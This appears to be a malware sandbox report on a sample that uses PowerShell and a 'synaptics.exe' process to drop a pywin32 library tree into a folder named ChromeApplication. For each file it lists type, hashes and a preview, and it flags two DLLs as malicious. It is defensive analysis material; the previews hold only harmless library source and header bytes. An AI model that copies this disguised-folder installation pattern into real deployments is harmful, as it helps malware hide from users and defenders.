                                                                                                                                                                                                  Preview:""".Windows Process Control..winprocess.run launches a child process and returns the exit code..Optionally, it can:. redirect stdin, stdout & stderr to files. run the command as another user. limit the process's running time. control the process window (location, size, window state, desktop).Works on Windows NT, 2000 & XP. Requires Mark Hammond's win32.extensions...This code is free for any purpose, with no warranty of any kind..-- John B. Dell'Aquila <jbd@alum.mit.edu>."""..import msvcrt.import os..import win32api.import win32con.import win32event.import win32gui.import win32process.import win32security...def logonUser(loginString):. """. Login as specified user and return handle.. loginString: 'Domain\nUser\nPassword'; for local. login use . or empty string as domain. e.g. '.\nadministrator\nsecret_password'. """. domain, user, passwd = loginString.split("\n"). return win32security.LogonUser(. user,. domain,. passwd,. w

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_win32sysloader.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):5.432025330493245
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ru0gls8JSQzzAk114R2SzyVIZUf+CvwFjOrfg00y5DdJkGITzapsK/1NYvSD:Pj8T114SVI49v0jga+DYGTsK/Z
                                                                                                                                                                                                  MD5:DF20C86EB75661DD6FD6C8E55F809632
                                                                                                                                                                                                  SHA1:6AD4D8B7AA6135CA8843BA81CC896E3C92D44F5A
                                                                                                                                                                                                  SHA-256:B1F5894857947DCC56B2BD96BB20FEEEB5A82CA8E0B4E89A9DE0A5FD97E3C883
                                                                                                                                                                                                  SHA-512:880A7ED713348AA76F4BFF5AB1B8E7EDC7FFA84133531C9966D841FF9BAA1F867E1CE079EE4D68F830AE24E4349B7BA7AAA71F663E16799059E3D6DAC55248F2
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Gh..Gh..Gh..N.@.Eh......Eh..S...Eh......Lh......Mh......Fh......Dh..Gh..`h......Fh......Fh......Fh..RichGh..........PE..L......d...........!.........................0...............................p............@......................... 6..`....6..d....P..t....................`..h...D1..T............................1..@............0...............................text............................... ..`.rdata..<....0......................@..@.data........@.......&..............@....rsrc...t....P.......(..............@..@.reloc..h....`.......,..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\_winxptheme.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20992
                                                                                                                                                                                                  Entropy (8bit):5.796402902582657
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6yclP60cRDyliPNYVPpRfGWYjlTbljBSmeP6mNFd1pbVMx8jPZWm7FWD:6Ji5y4PNsRfeblkSmN1pEaPZWm7FW
                                                                                                                                                                                                  MD5:2A7FAD1E3E2592F10CB7BF1AA9D373A3
                                                                                                                                                                                                  SHA1:C41FD641EBAEE4C84437AF863649C622881303C9
                                                                                                                                                                                                  SHA-256:AFA7F989C80486274B76313F92158334D09865B31719AEBAB13467007B5C878C
                                                                                                                                                                                                  SHA-512:3280D9C4F80A33940CE6056DEB16DC5134CAEDCBFC6B0FD2E695BB43303C7329A480F409F5165D50D7FD3C49128F2635714B7A7CC1ACA90BB0D0A90F84F5678B
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........b.X`..X`..X`..Q...\`......Z`......H`......R`......Y`......Z`......Z`..L...]`..X`...`......Y`......Y`......Y`..RichX`..........................PE..L......d...........!.....(...&......I$.......@............................................@..........................M..X...8N.......p..d............................E..T...........................@F..@............@..T............................text...!&.......(.................. ..`.rdata.......@.......,..............@..@.data........`.......D..............@....rsrc...d....p.......H..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\include\PyWinTypes.h

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:C++ source, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30076
                                                                                                                                                                                                  Entropy (8bit):5.341602934640227
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:P8Bv5BnuEpBwYAmY61w/gFQ277qiF3VeYY99IqZO4AcNZHVWqu:UdHnBwYAmY61w/727xeYqIqk49HVs
                                                                                                                                                                                                  MD5:56FA1335CD7890A5FDD33CC47A3FB347
                                                                                                                                                                                                  SHA1:65DDC9821823293D434F68095240C83B819F8CDF
                                                                                                                                                                                                  SHA-256:BD99175F3A8A791ED5C175BF3B3D8796DB9C11D6D9FF0BBF239DEE67EEEF50C6
                                                                                                                                                                                                  SHA-512:6481B7F5249ACF68B48960385921CD7CD0223C369E955034F4F28566DE8169EB625800289DCFF8CB77D4BF2ADDB599B158225190EDBAB94B08FA48386F889221
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:.#ifndef __PYWINTYPES_H__.#define __PYWINTYPES_H__..// If building under a GCC, tweak what we need..#if defined(__GNUC__) && defined(_POSIX_C_SOURCE).// python.h complains if _POSIX_C_SOURCE is already defined.#undef _POSIX_C_SOURCE.#endif..// windows rpc.h defines "small" as "char" which breaks Python's accu.h,.// so we undefine it before including python..#ifdef small.#undef small.#endif..#include "Python.h".#include "structmember.h".#include "windows.h"..// Helpers for our modules..// Some macros to help the pywin32 modules co-exist in py2x and py3k..// Creates and initializes local variables called 'module' and 'dict'...// Maybe these should all be removed - they existed to help in the py2->3.// transition..// On one hand: the code would be cleaner if they were all just re-inlined?.// On the other: high confidence everything uses the exact same patterns?.// (Regardless, *some*, eg, PYWIN_MODULE_INIT_RETURN_* should be re-inlined!)..// Use to define the function itself (ie, its name

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.10774944

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\ChromeApplication\synaptics.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):531
                                                                                                                                                                                                  Entropy (8bit):5.439938513169934
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:y/ULlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBn923m/Ar4uEHx:CURtWsrPJeMS4OjyJasv6OlBQqztmm
                                                                                                                                                                                                  MD5:012D54D5370DBD4AABDAFA11FBF3E25D
                                                                                                                                                                                                  SHA1:8FD5807374D19C74304EC22D951D2F4181B896D8
                                                                                                                                                                                                  SHA-256:B8F7D7AB962794321C25328BC8379D43767CAABBE69E18A1A0C9704674B4A7D1
                                                                                                                                                                                                  SHA-512:066128367536D4438A2C3D9325E911FC982D35F42E8E69D1B14A3E0772D5DF331583C9D0FF7C5E8F8F36EE6DB86E17AE117DF556C0FF10DE0D22E3DAB45E6272
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:o........h.f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....`C:\Users\user\AppData\Local\ChromeApplication\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\afxres.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15094
                                                                                                                                                                                                  Entropy (8bit):4.777558868848426
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p9+7gM0XJNbpbCffiskBtXvyhE+RjE5LedEIq0E1G+fe:pJNlCff8yxjE5LI4v1A
                                                                                                                                                                                                  MD5:370BEB77C36C0B2E840E6AB850FCE757
                                                                                                                                                                                                  SHA1:0A87A029CA417DAA03D22BE6EDDFDDBAC0B54D7A
                                                                                                                                                                                                  SHA-256:462659F2891D1D767EA4E7A32FC1DBBD05EC9FCFA9310ECDC0351B68F4C19ED5
                                                                                                                                                                                                  SHA-512:4E274071CA052CA0D0EF5297D61D06914F0BFB3161843B3CDCFDE5A2EA0368974FD2209732A4B00A488C84A80A5AB94AD4FD430FF1E4524C6425BAA59E4DA289
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from stdin.TCS_MULTILINE = 0x0200.CBRS_ALIGN_LEFT = 0x1000.CBRS_ALIGN_TOP = 0x2000.CBRS_ALIGN_RIGHT = 0x4000.CBRS_ALIGN_BOTTOM = 0x8000.CBRS_ALIGN_ANY = 0xF000.CBRS_BORDER_LEFT = 0x0100.CBRS_BORDER_TOP = 0x0200.CBRS_BORDER_RIGHT = 0x0400.CBRS_BORDER_BOTTOM = 0x0800.CBRS_BORDER_ANY = 0x0F00.CBRS_TOOLTIPS = 0x0010.CBRS_FLYBY = 0x0020.CBRS_FLOAT_MULTI = 0x0040.CBRS_BORDER_3D = 0x0080.CBRS_HIDE_INPLACE = 0x0008.CBRS_SIZE_DYNAMIC = 0x0004.CBRS_SIZE_FIXED = 0x0002.CBRS_FLOATING = 0x0001.CBRS_GRIPPER = 0x00400000.CBRS_ORIENT_HORZ = CBRS_ALIGN_TOP | CBRS_ALIGN_BOTTOM.CBRS_ORIENT_VERT = CBRS_ALIGN_LEFT | CBRS_ALIGN_RIGHT.CBRS_ORIENT_ANY = CBRS_ORIENT_HORZ | CBRS_ORIENT_VERT.CBRS_ALL = 0xFFFF.CBRS_NOALIGN = 0x00000000.CBRS_LEFT = CBRS_ALIGN_LEFT | CBRS_BORDER_RIGHT.CBRS_TOP = CBRS_ALIGN_TOP | CBRS_BORDER_BOTTOM.CBRS_RIGHT = CBRS_ALIGN_RIGHT | CBRS_BORDER_LEFT.CBRS_BOTTOM = CBRS_ALIGN_BOTTOM | CBRS_BORDER_TOP.SBPS_NORMAL = 0x0000.SBPS_NOBORDERS = 0x0100.SBPS_POPOUT = 0x0200.SB

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\commctrl.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46158
                                                                                                                                                                                                  Entropy (8bit):5.115928989304851
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:uWtH81fEtJlkArPaYMuFRRuBa2y+A+W50QFZL34uyEY8EYlCrVicdsAQy9gX35Z5:BtH81S2UFRRuQ/+oC6ykZYZW
                                                                                                                                                                                                  MD5:EF5F49B57CECD42E54C4533860FB3A3A
                                                                                                                                                                                                  SHA1:48FDEA29160EFC44107120AE30E3E2FE00D18FDC
                                                                                                                                                                                                  SHA-256:0E600EB9AEDF442AFA9476E1FDB3C6D9C76B7A58114DBEC736AC0060765E7D4E
                                                                                                                                                                                                  SHA-512:2F3DBB1102159766DF64C517CDF45296B5AFE1F63176964156C75976CEE1C06B7C5A7B9B662F2BB86841CE5C3032881701C8552EDB7CED48FA5AC035E3E92A89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from COMMCTRL.H.WM_USER = 1024.ICC_LISTVIEW_CLASSES = 1 # listview, header.ICC_TREEVIEW_CLASSES = 2 # treeview, tooltips.ICC_BAR_CLASSES = 4 # toolbar, statusbar, trackbar, tooltips.ICC_TAB_CLASSES = 8 # tab, tooltips.ICC_UPDOWN_CLASS = 16 # updown.ICC_PROGRESS_CLASS = 32 # progress.ICC_HOTKEY_CLASS = 64 # hotkey.ICC_ANIMATE_CLASS = 128 # animate.ICC_WIN95_CLASSES = 255.ICC_DATE_CLASSES = 256 # month picker, date picker, time picker, updown.ICC_USEREX_CLASSES = 512 # comboex.ICC_COOL_CLASSES = 1024 # rebar (coolbar) control.ICC_INTERNET_CLASSES = 2048.ICC_PAGESCROLLER_CLASS = 4096 # page scroller.ICC_NATIVEFNTCTL_CLASS = 8192 # native font control.ODT_HEADER = 100.ODT_TAB = 101.ODT_LISTVIEW = 102.PY_0U = 0.NM_FIRST = PY_0U # generic to all controls.NM_LAST = PY_0U - 99.LVN_FIRST = PY_0U - 100 # listview.LVN_LAST = PY_0U - 199.HDN_FIRST = PY_0U - 300 # header.HDN_LAST = PY_0U - 399.TVN_FIRST = PY_0U - 400 # treeview.TVN_LAST = PY_0U - 499.TTN_FIRST =

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\dbi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):713
                                                                                                                                                                                                  Entropy (8bit):4.602382429472932
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:OV5MqI03+JYspXHXPENQoSE9Xx5rX4m5AeTbTq2LaF5epDlDDDBrqXzU10Pr3Il:OVFIO+KsNMNQoS6Xx5D4XeTy8O5evDMa
                                                                                                                                                                                                  MD5:A17F92FB3695DC91A1B9042653DD2D0D
                                                                                                                                                                                                  SHA1:8DAC5D28EC5A645225741837FC9429BE04B08E26
                                                                                                                                                                                                  SHA-256:BE551C7BF0FCFF0736C0C8D5646F6976D22F912EA0B450CF9DF6EFF2E41F73B4
                                                                                                                                                                                                  SHA-512:4BEC3127FA494DD657EC02F297B9249BCD23DBC09506C3E3D0368B76EBD1FB3A0B0B5719A0420D3A204E173467FBCB6AFBB2E927E080C00010439354A057DD3F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Skeleton replacement for removed dbi module..Use of objects created by this module should be replaced with native Python objects..Dates are now returned as datetime.datetime objects, but will still accept PyTime.objects also..Raw data for binary fields should be passed as buffer objects for Python 2.x,.and memoryview objects in Py3k.."""..import warnings..warnings.warn(. "dbi module is obsolete, code should now use native python datetime and buffer/memoryview objects",. DeprecationWarning,.)..import datetime..dbDate = dbiDate = datetime.datetime..try:. dbRaw = dbiRaw = buffer.except NameError:. dbRaw = dbiRaw = memoryview..# type names are still exported by odbc module.from odbc import *.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\mmsystem.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30389
                                                                                                                                                                                                  Entropy (8bit):4.7770341275289425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:RKDYDaTFMojf23KJIi8njbxqVQNGTe1NuNN85:S4sf23K6i8n/0VQR
                                                                                                                                                                                                  MD5:875D9E40BE44575D4BB3FE3967976DED
                                                                                                                                                                                                  SHA1:B2F4B378C918D0F6329087E6103DEC19A32793AC
                                                                                                                                                                                                  SHA-256:930DBD298A1A246A9D8060467E06DFB729BAFDFF0E0FE98EAD3352CFFB6F81B0
                                                                                                                                                                                                  SHA-512:C27055A00FFCC17D0E362F2A9D61347CED34BFFD12CDBFF1987684ED0641CC86718EB26E2E80AEE8E80BCF9394DEA85B63931EF62EF9390B2AE61A0E4A7056B7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Generated by h2py from d:/msdev/include/mmsystem.h.MAXPNAMELEN = 32.MAXERRORLENGTH = 256.MAX_JOYSTICKOEMVXDNAME = 260.MM_MICROSOFT = 1.MM_MIDI_MAPPER = 1.MM_WAVE_MAPPER = 2.MM_SNDBLST_MIDIOUT = 3.MM_SNDBLST_MIDIIN = 4.MM_SNDBLST_SYNTH = 5.MM_SNDBLST_WAVEOUT = 6.MM_SNDBLST_WAVEIN = 7.MM_ADLIB = 9.MM_MPU401_MIDIOUT = 10.MM_MPU401_MIDIIN = 11.MM_PC_JOYSTICK = 12.TIME_MS = 0x0001.TIME_SAMPLES = 0x0002.TIME_BYTES = 0x0004.TIME_SMPTE = 0x0008.TIME_MIDI = 0x0010.TIME_TICKS = 0x0020.MM_JOY1MOVE = 0x3A0.MM_JOY2MOVE = 0x3A1.MM_JOY1ZMOVE = 0x3A2.MM_JOY2ZMOVE = 0x3A3.MM_JOY1BUTTONDOWN = 0x3B5.MM_JOY2BUTTONDOWN = 0x3B6.MM_JOY1BUTTONUP = 0x3B7.MM_JOY2BUTTONUP = 0x3B8.MM_MCINOTIFY = 0x3B9.MM_WOM_OPEN = 0x3BB.MM_WOM_CLOSE = 0x3BC.MM_WOM_DONE = 0x3BD.MM_WIM_OPEN = 0x3BE.MM_WIM_CLOSE = 0x3BF.MM_WIM_DATA = 0x3C0.MM_MIM_OPEN = 0x3C1.MM_MIM_CLOSE = 0x3C2.MM_MIM_DATA = 0x3C3.MM_MIM_LONGDATA = 0x3C4.MM_MIM_ERROR = 0x3C5.MM_MIM_LONGERROR = 0x3C6.MM_MOM_OPEN = 0x3C7.MM_MOM_CLOSE = 0x3C8.MM_MOM_DONE = 0x3C9.M

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\netbios.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6948
                                                                                                                                                                                                  Entropy (8bit):5.17742075576656
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:kWxBIR46qdgb42yLuDTPhU1Wn5l2z0/LDyWnhyWACyWkhyWvgyWmyWshyWkEyWR9:kWxBIR4tpxLuDTPrkGPaWYQx
                                                                                                                                                                                                  MD5:D613CD1C4C09BCB74DAC2B3044AF08F2
                                                                                                                                                                                                  SHA1:79434FC6AEB15EA86A9CCC16225035AB23A1239A
                                                                                                                                                                                                  SHA-256:A56A021FC24320BEB5EC5F046E7CC758FF3A0306E3D800B0252FCF8CFE661DB3
                                                                                                                                                                                                  SHA-512:F00552644D534CE8E7B69E9C993BB9283FA1F3BE8BB5A3E4864F5A71CB2EF2DD0DFB700127284EA4669FD479F8560FF007DA0AD1B0EB785523A416D87E8121F5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import struct.import sys..import win32wnet..# Constants generated by h2py from nb30.h.NCBNAMSZ = 16.MAX_LANA = 254.NAME_FLAGS_MASK = 0x87.GROUP_NAME = 0x80.UNIQUE_NAME = 0x00.REGISTERING = 0x00.REGISTERED = 0x04.DEREGISTERED = 0x05.DUPLICATE = 0x06.DUPLICATE_DEREG = 0x07.LISTEN_OUTSTANDING = 0x01.CALL_PENDING = 0x02.SESSION_ESTABLISHED = 0x03.HANGUP_PENDING = 0x04.HANGUP_COMPLETE = 0x05.SESSION_ABORTED = 0x06.ALL_TRANSPORTS = "M\0\0\0".MS_NBF = "MNBF".NCBCALL = 0x10.NCBLISTEN = 0x11.NCBHANGUP = 0x12.NCBSEND = 0x14.NCBRECV = 0x15.NCBRECVANY = 0x16.NCBCHAINSEND = 0x17.NCBDGSEND = 0x20.NCBDGRECV = 0x21.NCBDGSENDBC = 0x22.NCBDGRECVBC = 0x23.NCBADDNAME = 0x30.NCBDELNAME = 0x31.NCBRESET = 0x32.NCBASTAT = 0x33.NCBSSTAT = 0x34.NCBCANCEL = 0x35.NCBADDGRNAME = 0x36.NCBENUM = 0x37.NCBUNLINK = 0x70.NCBSENDNA = 0x71.NCBCHAINSENDNA = 0x72.NCBLANSTALERT = 0x73.NCBACTION = 0x77.NCBFINDNAME = 0x78.NCBTRACE = 0x79.ASYNCH = 0x80.NRC_GOODRET = 0x00.NRC_BUFLEN = 0x01.NRC_ILLCMD = 0x03.NRC_CMDTMO = 0x05.NRC

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\ntsecuritycon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22344
                                                                                                                                                                                                  Entropy (8bit):5.171445425681835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:36TxDCxTO5M0TX1w8DWlhhVFJwXJWKSM7NvBkYnn62jeHXBheO4ZLMGldeiDSOhu:3cpdSiNvmYnn62AXBhz4FM+deioh
                                                                                                                                                                                                  MD5:ACDBB2AB8B92D9CCEFBB4CCD12E6D070
                                                                                                                                                                                                  SHA1:FD78B196A79FB1C24299F6BBA689B0CB478EECA9
                                                                                                                                                                                                  SHA-256:FE53CAA6C8A2F7CA98BCAFA3427779BBCA69ED29481B4DEAA7E5FA3AA8B0E6A3
                                                                                                                                                                                                  SHA-512:D189AA75D396B8ADF47AE910B09A8654CC878B784A30883A075DAF9CE87628213B96038E72A1C37DE9C0EECAD21088DF864057C874C24C1F3D22317122D5D289
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Hacked from winnt.h..DELETE = 65536.READ_CONTROL = 131072.WRITE_DAC = 262144.WRITE_OWNER = 524288.SYNCHRONIZE = 1048576.STANDARD_RIGHTS_REQUIRED = 983040.STANDARD_RIGHTS_READ = READ_CONTROL.STANDARD_RIGHTS_WRITE = READ_CONTROL.STANDARD_RIGHTS_EXECUTE = READ_CONTROL.STANDARD_RIGHTS_ALL = 2031616.SPECIFIC_RIGHTS_ALL = 65535.ACCESS_SYSTEM_SECURITY = 16777216.MAXIMUM_ALLOWED = 33554432.GENERIC_READ = -2147483648.GENERIC_WRITE = 1073741824.GENERIC_EXECUTE = 536870912.GENERIC_ALL = 268435456..# file security permissions.FILE_READ_DATA = 1.FILE_LIST_DIRECTORY = 1.FILE_WRITE_DATA = 2.FILE_ADD_FILE = 2.FILE_APPEND_DATA = 4.FILE_ADD_SUBDIRECTORY = 4.FILE_CREATE_PIPE_INSTANCE = 4.FILE_READ_EA = 8.FILE_WRITE_EA = 16.FILE_EXECUTE = 32.FILE_TRAVERSE = 32.FILE_DELETE_CHILD = 64.FILE_READ_ATTRIBUTES = 128.FILE_WRITE_ATTRIBUTES = 256.FILE_ALL_ACCESS = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 511.FILE_GENERIC_READ = (. STANDARD_RIGHTS_READ. | FILE_READ_DATA. | FILE_READ_ATTRIBUTES. | FILE_

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1283
                                                                                                                                                                                                  Entropy (8bit):4.661736923288396
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:++iqs0ePxlBfU3Yc3pRFN9qz7HuL2JSRhm88pFratv1oPM2j2CK2aV4bo/n2123:+7PXq3xp3N9q3HaDGFrawXyC9PE3
                                                                                                                                                                                                  MD5:5D28A84AA364BCD31FDB5C5213884EF7
                                                                                                                                                                                                  SHA1:0874DCA2AD64E2C957B0A8FD50588FB6652DD8EE
                                                                                                                                                                                                  SHA-256:E298DDCFCB0232257FCAA330844845A4E7807C4E2B5BD938929ED1791CD9D192
                                                                                                                                                                                                  SHA-512:24C1AD9CE1D7E7E3486E8111D8049EF1585CAB17B97D29C7A4EB816F7BDF34406AA678F449F8C680B7F8F3F3C8BC164EDAC95CCB15DA654EF9DF86C5BEB199A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Imported by pywin32.pth to bootstrap the pywin32 environment in "portable".# environments or any other case where the post-install script isn't run..#.# In short, there's a directory installed by pywin32 named 'pywin32_system32'.# with some important DLLs which need to be found by Python when some pywin32.# modules are imported..# If Python has `os.add_dll_directory()`, we need to call it with this path..# Otherwise, we add this path to PATH....try:. import pywin32_system32.except ImportError: # Python .3.6: replace ImportError with ModuleNotFoundError. pass.else:. import os.. # We're guaranteed only that __path__: Iterable[str]. # https://docs.python.org/3/reference/import.html#__path__. for path in pywin32_system32.__path__:. if os.path.isdir(path):. if hasattr(os, "add_dll_directory"):. os.add_dll_directory(path). # This is to ensure the pywin32 path is in the beginning to find the. # pywin32 DLLs first an

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_testutil.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11552
                                                                                                                                                                                                  Entropy (8bit):4.499300065894434
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:62xH/42BdXjaMMhqH0eRhAcjWKTR7AXTv3Hm5z:66H62H0khAOXV0XTvm5z
                                                                                                                                                                                                  MD5:9C5202F60D6DA913C7CAF90DC9373281
                                                                                                                                                                                                  SHA1:9F961266AE675DDF9C5FF9AB5047C9D7ECEAAF6A
                                                                                                                                                                                                  SHA-256:79AB4108C89ACA419476CE9B96F32966800A3FC159812C10B1AE1E3E67DF2FB5
                                                                                                                                                                                                  SHA-512:6D3C07C23A2DCF7838B8D2B2D545598C5B5EADC62370571C824EDB6CA0A2B31222E1E713B5FBBDFA8F86ACF8161D2C134CDA4A1442FB44BD7BBA240FD55F0DC1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Utilities for the pywin32 tests.import gc.import os.import site.import sys.import unittest..import winerror..##.## General purpose utilities for the test suite..##...# The test suite has lots of string constants containing binary data, but.# the strings are used in various "bytes" contexts..def str2bytes(sval):. if sys.version_info < (3, 0) and isinstance(sval, str):. sval = sval.decode("latin1"). return sval.encode("latin1")...# Sometimes we want to pass a string that should explicitly be treated as.# a memory blob..def str2memory(sval):. if sys.version_info < (3, 0):. return buffer(sval). # py3k.. return memoryview(sval.encode("latin1"))...# Sometimes we want to pass an object that exposes its memory.def ob2memory(ob):. if sys.version_info < (3, 0):. return buffer(ob). # py3k.. return memoryview(ob)...##.## unittest related stuff.##...# This is a specialized TestCase adaptor which wraps a real test..class LeakTestCase(unittest.TestCase):

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywintypes.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5938
                                                                                                                                                                                                  Entropy (8bit):4.44618870200388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QWrCPU5+9J3RONAy1jeBPAVkJzjAhF2hAbXxM/ADIWaDyRkI+oiCG/Ym:Q/PU5OQD04VkZEh1OI8FyFApYm
                                                                                                                                                                                                  MD5:B4FB724E0920809325DC40BC7E7C2813
                                                                                                                                                                                                  SHA1:3C5F3D8966E28C14757B64E5E4BE521DCAFC51F9
                                                                                                                                                                                                  SHA-256:298DCE6680D5005FE34240C6AAC3547D98FEFC33A0C4DB5E9F0A32C284ED09B4
                                                                                                                                                                                                  SHA-512:5D03A2D921FD49667D88A0D99D457B74F863B6F4F8FBB3620030EB44CDAEAEFCD82F7DABFA5E634A29528ABCB17D4E125868CC52835A3CE0BFC67A1770AC38FA
                                                                                                                                                                                                  Malicious:false
